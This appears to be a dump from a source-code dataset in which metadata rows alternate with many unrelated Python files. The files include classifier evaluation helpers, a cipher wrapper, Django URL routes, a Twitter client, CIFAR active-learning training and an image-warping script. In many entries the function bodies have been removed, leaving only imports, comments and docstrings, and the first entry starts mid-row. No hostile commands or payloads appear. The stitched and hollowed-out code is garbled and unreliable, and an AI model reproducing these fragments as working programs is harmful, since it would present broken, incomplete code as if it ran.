] | null | null | null | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
] | null | null | null | O.py | duongnguyenkt11/data-realtime | 9d8f6c8e0f6a766c058d0696669543dbafaff63c | [
"MIT"
] | null | null | null | from functools import reduce
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_notebook
from CONSTANTS import *
from utilities import *
from bokeh.plotting import figure, output_file, show
import pandas as pd, numpy as np
# Active runtime-environment selector; `C` comes from the wildcard
# `from CONSTANTS import *` above.  Presumably switched away from LOCAL for
# deployed runs -- confirm against the CONSTANTS module.
ENVIRON = C.LOCAL
| 41.137931 | 124 | 0.524009 |
6296eebeb1e65d269ec9089013edb6a402685434 | 6,790 | py | Python | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | project1/evaluation.py | DiscoBroccoli/logistic-regression-and-naive-Bayes-from-Scratch | bcb24a9258ea004a3694e6eaa524b499c2584f96 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# [0,0] = TN
# [1,1] = TP
# [0,1] = FP
# [1,0] = FN
# cm is a confusion matrix
# Accuracy: (TP + TN) / Total
# Precision: TP / (TP + FP)
# False positive rate: FP / N = FP / (FP + TN)
# True positive rate: TP / P = TP / (TP + FN)
# Equivalent to sensitivity/recall
# F1 score: 2 * precision * recall / (precision + recall)
# Returns a confusion matrix for labels and predictions
# [[TN, FP],
# [FN, TP]]
# Function to return two shuffled arrays, is a deep copy
# Shuffles and splits data into two sets
# test split will be 1/size of the data
# assume 5 fold for now
| 29.267241 | 126 | 0.610162 |
62982d88e6406e32cdc302d54bc0206efda33025 | 957 | py | Python | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 144 | 2020-09-13T22:54:57.000Z | 2022-02-24T21:54:25.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 587 | 2020-05-06T18:55:07.000Z | 2021-09-20T13:14:53.000Z | LeetCode/0005_Longest_Palindromic_Substring.py | Achyut-sudo/PythonAlgorithms | 21fb6522510fde7a0877b19a8cedd4665938a4df | [
"MIT"
] | 523 | 2020-09-09T12:07:13.000Z | 2022-02-24T21:54:31.000Z | '''
Problem:-
Given a string s, find the longest palindromic substring in s.
You may assume that the maximum length of s is 1000.
Example 1:
Input: "babad"
Output: "bab"
Note: "aba" is also a valid answer.
''' | 25.184211 | 63 | 0.378265 |
6299c0fed43754304eadd3c72255fa97d06e27b5 | 119 | py | Python | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | 17 | 2018-09-09T10:56:58.000Z | 2022-02-22T07:18:50.000Z | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | null | null | null | pyimagesearch/utils/__init__.py | agoila/lisa-faster-R-CNN | 3b88c9b7da2106a805089f9619ea62cdc1f21d99 | [
"MIT"
] | 21 | 2018-09-19T11:07:10.000Z | 2022-02-22T07:18:45.000Z | # import the necessary packages
from .agegenderhelper import AgeGenderHelper
from .imagenethelper import ImageNetHelper | 39.666667 | 44 | 0.87395 |
6299f854c3c07764e1143810fd65fb9514af0ec6 | 2,965 | py | Python | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | 2 | 2021-08-22T00:43:05.000Z | 2021-08-22T01:57:28.000Z | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | null | null | null | pylibressl/cipher/onion.py | yl3dy/pylibressl | ffc3e195a31a6c96b28e52a7e146995219b220b2 | [
"MIT"
] | 1 | 2021-08-24T19:09:06.000Z | 2021-08-24T19:09:06.000Z | from .. import lib
from ..exceptions import *
from .. import _libressl
from .cipher import BaseCipher
from .auth import BaseCipherAuth
from .auth import GOST89_HMAC_Streebog512, AES256_GCM
ffi, clib = _libressl.ffi, _libressl.lib
Onion_AES256_GOST89 = OnionCipher.new((AES256_GCM, GOST89_HMAC_Streebog512),
name='Onion_AES256_GOST89')
Onion_AES256_GOST89.__doc__ = 'Onion ciphering: AES256-GCM + ' + \
'GOST89-HMAC-Streebog512'
| 37.0625 | 79 | 0.577403 |
629aa7218a98f287f8a5760fc5e65461390c3529 | 1,149 | py | Python | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 18 | 2020-03-06T14:54:29.000Z | 2022-03-21T20:20:42.000Z | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 7 | 2020-04-19T15:21:54.000Z | 2022-03-05T14:27:38.000Z | tests/plots/density_estimate.py | bws428/ambiance | 8cbc5fe38f34e1ce8ccf568d0961ad6573f7b612 | [
"Apache-2.0"
] | 7 | 2019-12-30T16:22:24.000Z | 2021-09-08T07:36:23.000Z | import os
import numpy as np
import matplotlib.pyplot as plt
from ambiance import Atmosphere, CONST
HERE = os.path.abspath(os.path.dirname(__file__))
FILE_NAME = os.path.basename(__file__).replace('.py', '.png')
PATH_OUT = os.path.join(HERE, FILE_NAME)
# Make an atmosphere object
heights = np.linspace(-10e3, 90e3, num=1000)
rho_actual = Atmosphere(heights, check_bounds=False).density
rho_approx = density_estimate(heights)
fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True, tight_layout=True)
ax1.plot(rho_actual, heights/1000, label='Actual', c='blue')
ax1.plot(rho_approx, heights/1000, '--', label='Estimate', c='red')
ax1.set_xlabel("Density [kg/m^3]")
ax1.set_ylabel("Height [km]")
ax1.set_xscale("log")
ax1.grid()
ax1.legend()
for ax in (ax1, ax2):
ax.axhline(y=CONST.h_min/1000, ls=':', color='black')
ax.axhline(y=CONST.h_max/1000, ls=':', color='black')
rdiff = (rho_approx - rho_actual)/rho_actual
ax2.plot(rdiff*100, heights/1000, label='Relative error', c='red')
ax2.set_xlabel("Relative error [%]")
ax2.grid()
plt.savefig(PATH_OUT)
plt.show()
plt.clf()
| 27.357143 | 68 | 0.711923 |
629b94b4505379de3aa682273cf3ce0b75e0c007 | 1,277 | py | Python | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2015-01-29T06:52:36.000Z | 2015-01-29T06:52:36.000Z | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | pkgs/numba-0.24.0-np110py27_0/lib/python2.7/site-packages/numba/tests/test_sets.py | wangyum/anaconda | 6e5a0dbead3327661d73a61e85414cf92aa52be6 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | from __future__ import print_function
import numba.unittest_support as unittest
from numba.utils import PYVERSION
from .support import TestCase, enable_pyobj_flags
needs_set_literals = unittest.skipIf(PYVERSION < (2, 7),
"set literals unavailable before Python 2.7")
if __name__ == '__main__':
unittest.main()
| 29.697674 | 82 | 0.653876 |
629ca661207da75df901826b3e4cddc99718c385 | 1,188 | py | Python | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | 1 | 2021-07-08T21:37:17.000Z | 2021-07-08T21:37:17.000Z | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | null | null | null | docs/_static/rc4.py | Varbin/pep272-encryption | db0795396226a9d49d8825e29c550739ff222539 | [
"CC0-1.0"
] | null | null | null | from pep272_encryption import PEP272Cipher, MODE_ECB
block_size = 1
key_size = 0
assert RC4Cipher(b'\x01\x02\x03\x04\x05').encrypt(b'\x00'*16) \
== b"\xb29c\x05\xf0=\xc0'\xcc\xc3RJ\n\x11\x18\xa8"
| 27.627907 | 71 | 0.574074 |
629e0a7c590dbbe85c6d17dfffa34ca982e371ac | 12,316 | py | Python | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 49 | 2016-06-29T22:51:50.000Z | 2020-07-06T09:15:41.000Z | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 1 | 2019-07-20T11:09:14.000Z | 2019-07-20T11:09:14.000Z | Packages/mdpopups/st3/mdpopups/st_color_scheme_matcher.py | Michael-Villano/Sublime-setup | 15a992d5982337169dadb50fd0dbca4ca3be992e | [
"MIT"
] | 13 | 2016-09-13T13:26:24.000Z | 2021-04-28T03:17:19.000Z | """
color_scheme_matcher.
Licensed under MIT.
Copyright (C) 2012 Andrew Gibson <agibsonsw@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of
the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
---------------------
Original code has been heavily modifed by Isaac Muse <isaacmuse@gmail.com> for the ExportHtml project.
Algorithm has been split out into a separate library and been enhanced with a number of features.
"""
from __future__ import absolute_import
import sublime
import re
from .rgba import RGBA
from os import path
from collections import namedtuple
from plistlib import readPlistFromBytes
def sublime_format_path(pth):
    """Normalize *pth* to the forward-slash form Sublime uses internally.

    On Windows, a leading drive-letter prefix (``C:\\`` or ``C:/``) is
    rewritten as ``C/``; afterwards every backslash becomes a forward slash.
    """
    drive = re.match(r"^([A-Za-z]{1}):(?:/|\\)(.*)", pth)
    if sublime.platform() == "windows" and drive is not None:
        pth = "/".join(drive.groups())
    return pth.replace("\\", "/")
| 43.985714 | 120 | 0.60531 |
629f16a424f010c4c41e887a5a673cd1324c487c | 820 | py | Python | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | hadoop/hadoop/node.py | DropletProbe/shellscripts | d070eef24cd6003694d81a3bdc38f2097452c076 | [
"MIT"
] | null | null | null | import re
# if __name__ == "__main__":
# a = Node(1, "192.168.1.300", 1, 1)
# a.validate()
| 28.275862 | 132 | 0.540244 |
629facc04419dcfc8b14e0e646d18577710d3fd8 | 134 | py | Python | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | Python/School/C7/q2.py | abdalrhmanyasser/Abdalrhman_Rep | e0fc3caa2cc04e92f591ccd7934586986d194000 | [
"CC0-1.0"
] | null | null | null | from random import *
# Build 50 random integers in [1, 100] with a comprehension instead of a
# manual append loop (`randint` comes from the wildcard import above),
# print them, then square every element in place so the module-level name
# `l` keeps the same object for the final print that follows this block.
l = [randint(1, 100) for _ in range(50)]
print(l)
# enumerate() replaces the non-idiomatic `for i in range(len(l))` pattern.
for i, value in enumerate(l):
    l[i] = value ** 2
print(l) | 16.75 | 29 | 0.58209 |
62a017f4ec169c103d6b2ccf1047abf661d12ee5 | 827 | py | Python | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | code401challengespython/radix_sort/radix_sort.py | danhuyle508/data-structures-and-algorithms | 476f32ebcde0350390e36d32e5dc7911ac9bab09 | [
"MIT"
] | null | null | null | import math | 28.517241 | 60 | 0.436518 |
62a043b5cf107ad3ad2080e48c27d0e71c339360 | 4,232 | py | Python | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | main_no_module.py | KMU-AELAB-AL/random | 40c796cb6936742eace4651b1525ba6bea88b37d | [
"MIT"
] | null | null | null | import os
import random
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader
import torch.optim.lr_scheduler as lr_scheduler
from torch.utils.data.sampler import SubsetRandomSampler
from torchvision.datasets import CIFAR100, CIFAR10
from tqdm import tqdm
from config import *
from models.resnet import ResNet18
from data.transform import Cifar
# Fix every RNG so the labeled/unlabeled splits and training are repeatable.
random.seed('KMU_AELAB')
torch.manual_seed(0)
torch.backends.cudnn.deterministic = True  # force deterministic cuDNN kernels
transforms = Cifar()  # project helper providing train/test transform pair
# Three views of the chosen CIFAR data: the train split under the training
# transform, the same train split under the test transform (used as the
# unlabeled pool), and the held-out test split.
if DATASET == 'cifar10':
    data_train = CIFAR10('./data', train=True, download=True, transform=transforms.train_transform)
    data_unlabeled = CIFAR10('./data', train=True, download=True, transform=transforms.test_transform)
    data_test = CIFAR10('./data', train=False, download=True, transform=transforms.test_transform)
elif DATASET == 'cifar100':
    data_train = CIFAR100('./data', train=True, download=True, transform=transforms.train_transform)
    data_unlabeled = CIFAR100('./data', train=True, download=True, transform=transforms.test_transform)
    data_test = CIFAR100('./data', train=False, download=True, transform=transforms.test_transform)
else:
    # NOTE(review): FileExistsError is an odd exception for an unknown
    # dataset name; ValueError would describe the failure better.
    raise FileExistsError
if __name__ == '__main__':
    # Random-sampling active-learning baseline: run TRIALS independent
    # experiments, each writing per-cycle test accuracy to record_<n>.txt.
    for trial in range(TRIALS):
        # NOTE(review): the file is not closed if an exception escapes the
        # loop body; a `with` block would be safer.
        fp = open(f'record_{trial + 1}.txt', 'w')
        # Random initial labeled/unlabeled split of the training indices.
        indices = list(range(NUM_TRAIN))
        random.shuffle(indices)
        labeled_set = indices[:INIT_CNT]
        unlabeled_set = indices[INIT_CNT:]
        train_loader = DataLoader(data_train, batch_size=BATCH,
                                  sampler=SubsetRandomSampler(labeled_set),
                                  pin_memory=True)
        test_loader = DataLoader(data_test, batch_size=BATCH)
        dataloaders = {'train': train_loader, 'test': test_loader}
        # One model per trial; it keeps training across cycles (it is not
        # re-initialized when new labels are added).
        model = ResNet18(num_classes=CLS_CNT).cuda()
        torch.backends.cudnn.benchmark = False
        for cycle in range(CYCLES):
            # Fresh loss/optimizer/schedule each cycle; train() and test()
            # are project helpers defined elsewhere in the original file.
            criterion = nn.CrossEntropyLoss().cuda()
            optimizer = optim.SGD(model.parameters(), lr=LR, momentum=MOMENTUM, weight_decay=WDECAY)
            scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=MILESTONES)
            train(model, criterion, optimizer, scheduler, dataloaders, EPOCH)
            acc = test(model, dataloaders, mode='test')
            fp.write(f'{acc}\n')
            print('Trial {}/{} || Cycle {}/{} || Label set size {}: Test acc {}'.format(trial + 1, TRIALS, cycle + 1,
                                                                                       CYCLES, len(labeled_set), acc))
            # "Random" query strategy: move ADDENDUM randomly chosen samples
            # from the unlabeled pool into the labeled set, then rebuild the
            # training loader over the enlarged labeled set.
            random.shuffle(unlabeled_set)
            labeled_set += unlabeled_set[:ADDENDUM]
            unlabeled_set = unlabeled_set[ADDENDUM:]
            dataloaders['train'] = DataLoader(data_train, batch_size=BATCH,
                                              sampler=SubsetRandomSampler(labeled_set),
                                              pin_memory=True)
        fp.close()
| 32.553846 | 119 | 0.629962 |
62a2a70bfd5dba6090a4f4d7e8ad09c40c0c9748 | 1,284 | py | Python | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | deployment_scripts/python/modules/deploy_mgmt.py | Nexenta/fuel-plugin-nexentaedge | 6cd55bdfd40b4e9e841834b4f8dac29f1684af8e | [
"Apache-2.0"
] | null | null | null | import sys
from nexentaedge.utils import get_sid
from nexentaedge.nedgeConfigurator import NedgeMgmtConfigurator
from utils import get_iface_name_by_mac_from_list
from utils import get_deployment_config
# Script entry point; main() is defined earlier in the original file
# (not visible in this chunk).
if __name__ == '__main__':
    main()
| 29.181818 | 79 | 0.63785 |
62a3ad6a413be7104ebcc620eae261f63aeb9314 | 1,234 | py | Python | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | bookmarks/account/urls.py | dorotan/social | f78dc84554ef37c40f661ee1350bd3d5ade51d46 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import url
from django.contrib.auth import views as auth_views
from django.contrib.auth import views
from . import views
# Account URL configuration (Django 1.x `url()` routes): login/logout,
# dashboard, profile editing, password change/reset flows and registration.
urlpatterns = [
    # Custom login view (kept for reference)
    # url(r'^login/$', views.user_login, name='login'),
    # Built-in login view
    url(r'^login/$', auth_views.login, name='login'),
    url(r'^edit/$', views.edit, name='edit'),
    url(r'^logout/$', auth_views.logout, name='logout'),
    url(r'^logout_then_login/$', auth_views.logout_then_login, name='logout_then_login'),
    url(r'^$', views.dashboard, name='dashboard'),
    # Password change for authenticated users (Django built-in views)
    url(r'^password_change/$', auth_views.password_change, name='password_change'),
    url(r'^password_change/done/$', auth_views.password_change_done, name='password_change_done'),
    # Password reset flow (Django built-in views)
    url(r'^password_reset/$', auth_views.password_reset, name='password_reset'),
    url(r'^password_reset/done/$', auth_views.password_reset_done, name='password_reset_done'),
    url(r'^password_reset/confirm/(?P<uidb64>[0-9A-Za-z]+)-(?P<token>.+)/$', auth_views.password_reset_confirm, name='password_reset_confirm'),
    url(r'^password_reset/complete/$', auth_views.password_reset_complete, name='password_reset_complete'),
    url(r'^register/$', views.register, name='register'),
]
| 51.416667 | 143 | 0.71799 |
62a3b336bd6bebedcff30395fd32342d7e3cb1c2 | 10,195 | py | Python | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | 1 | 2015-11-08T12:46:28.000Z | 2015-11-08T12:46:28.000Z | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | examples/twitter.py | alex/remoteobjects | 4fd1d03fc5ec041fa226d93bdf4a0188ce569b4c | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A Twitter API client, implemented using remoteobjects.
"""
__version__ = '1.1'
__date__ = '17 April 2009'
__author__ = 'Brad Choate'
import httplib
from optparse import OptionParser
import sys
from urllib import urlencode, quote_plus
from urlparse import urljoin, urlunsplit
from httplib2 import Http
from remoteobjects import RemoteObject, fields, ListObject
def show_public(twitter):
    """Print each status on the client's public timeline (Python 2 code)."""
    print "## Public timeline ##"
    for tweet in twitter.public_timeline():
        print unicode(tweet)
# Script entry point: main() (defined earlier in the original file) returns
# the process exit status, which is handed to sys.exit().
if __name__ == '__main__':
    sys.exit(main())
| 32.059748 | 114 | 0.665326 |
62a5341859cb97bf208e99d03085417e4406b355 | 1,119 | py | Python | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | droxi/drox/write.py | andydude/droxtools | d608ceb715908fb00398c0d28eee74286fef3750 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# droxi
# Copyright (c) 2014, Andrew Robbins, All rights reserved.
#
# This library ("it") is free software; it is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; you can redistribute it and/or modify it under the terms of the
# GNU Lesser General Public License ("LGPLv3") <https://www.gnu.org/licenses/lgpl.html>.
from __future__ import absolute_import
import sys
import importlib
from .etree import etree
from .config import DEBUG | 31.971429 | 93 | 0.669348 |
62a6aa5f52b205b9fb58d93a1dc26a90e2c69fff | 5,224 | py | Python | hathor/transaction/aux_pow.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 51 | 2019-12-28T03:33:27.000Z | 2022-03-10T14:03:03.000Z | hathor/transaction/aux_pow.py | mbnunes/hathor-core | e5e0d4a627341e2a37ee46db5c9354ddb7f8dfb8 | [
"Apache-2.0"
] | 316 | 2019-09-10T09:20:05.000Z | 2022-03-31T20:18:56.000Z | hathor/transaction/aux_pow.py | jansegre/hathor-core | 22b3de6be2518e7a0797edbf0e4f6eb1cf28d6fd | [
"Apache-2.0"
] | 19 | 2020-01-04T00:13:18.000Z | 2022-02-08T21:18:46.000Z | # Copyright 2021 Hathor Labs
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, NamedTuple
from structlog import get_logger
from hathor import protos
logger = get_logger()
| 41.460317 | 105 | 0.647205 |
62a6cdcc5cf9bca5a11b6dc4e9f38e91015abe52 | 502 | py | Python | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 423 | 2015-01-06T02:46:46.000Z | 2022-03-23T17:20:38.000Z | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 243 | 2015-01-03T02:10:03.000Z | 2022-03-31T19:29:48.000Z | cortex/export/__init__.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 136 | 2015-03-23T20:35:59.000Z | 2022-03-09T13:39:10.000Z | from .save_views import save_3d_views
from .panels import plot_panels
from ._default_params import (
params_inflatedless_lateral_medial_ventral,
params_flatmap_lateral_medial,
params_occipital_triple_view,
params_inflated_dorsal_lateral_medial_ventral,
)
# Public API of cortex.export: the two plotting entry points plus the
# ready-made parameter presets imported above.
__all__ = [
    "save_3d_views",
    "plot_panels",
    "params_flatmap_lateral_medial",
    "params_occipital_triple_view",
    "params_inflatedless_lateral_medial_ventral",
    "params_inflated_dorsal_lateral_medial_ventral",
]
| 27.888889 | 52 | 0.804781 |
62a72c2067d3b5d382112ffdbd4e31435a1725b9 | 1,456 | py | Python | pyfr/plugins/dtstats.py | DengSonic/PyFR | dde524ed56f4a4feca376b51db4b21eb6fa4b113 | [
"BSD-3-Clause"
] | 1 | 2020-06-23T16:37:06.000Z | 2020-06-23T16:37:06.000Z | pyfr/plugins/dtstats.py | synthetik-technologies/PyFR | 9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda | [
"BSD-3-Clause"
] | null | null | null | pyfr/plugins/dtstats.py | synthetik-technologies/PyFR | 9d4d5e96a8a9d5ca47970ec197b251ae8b0ecdda | [
"BSD-3-Clause"
] | 1 | 2020-08-21T02:50:17.000Z | 2020-08-21T02:50:17.000Z | # -*- coding: utf-8 -*-
from pyfr.mpiutil import get_comm_rank_root
from pyfr.plugins.base import BasePlugin, init_csv
| 29.12 | 76 | 0.581731 |
62a840352bdaa921e3b37484cc7f2c625c055007 | 1,989 | py | Python | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | 3 | 2020-12-24T19:02:19.000Z | 2021-07-17T07:48:54.000Z | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | null | null | null | scripts/cylindrical.py | NunchakusLei/Panoramas-with-image-stitching | a0c9a292d53f22e4de82fe337935c946064fe519 | [
"Apache-2.0"
] | null | null | null | # The source of this script is from:
# https://github.com/TejasNaikk/Image-Alignment-and-Panoramas/blob/master/main.py
import cv2
import numpy as np
import math
'''
Warp an image from cartesian coordinates (x, y) into cylindrical coordinates (theta, h)
Returns: (image, mask)
Mask is [0,255], and has 255s wherever the cylindrical images has a valid value.
Masks are useful for stitching
Usage example:
im = cv2.imread("myimage.jpg",0) #grayscale
h,w = im.shape
f = 700
K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
imcyl = cylindricalWarpImage(im, K)
'''
if __name__ == "__main__":
    # Demo: warp a sample image into cylindrical coordinates and display it.
    # NOTE(review): cv2.imread returns None when the file is missing; there
    # is no check before `.shape` below.
    im = cv2.imread('../data/example-data/flower/1.jpg')
    h,w = im.shape[:2]
    f = 700  # assumed focal length in pixels (same value as the usage example above)
    K = np.array([[f, 0, w/2], [0, f, h/2], [0, 0, 1]]) # mock calibration matrix
    # Per the module docstring above, cylindricalWarpImage (defined earlier
    # in the original file) returns an (image, mask) pair; show the image.
    imcyl = cylindricalWarpImage(im, K)
    cv2.imshow("test", imcyl[0])
    cv2.waitKey()
    cv2.destroyAllWindows()
| 29.25 | 87 | 0.581699 |
62a90788c7716583df977b2015db0ceb313c24a8 | 7,490 | py | Python | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | fmt/pythonfmt/fmt.py | KarlRong/Safe-RL-for-Driving | 67484911ca8ad9f1476e96043c379c01cd5ced8c | [
"Apache-2.0"
] | null | null | null | import math
import random
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from fmt.pythonfmt.doubleintegrator import filter_reachable, gen_trajectory, show_trajectory
from fmt.pythonfmt.world import World
# FMTree class
| 40.486486 | 105 | 0.554072 |
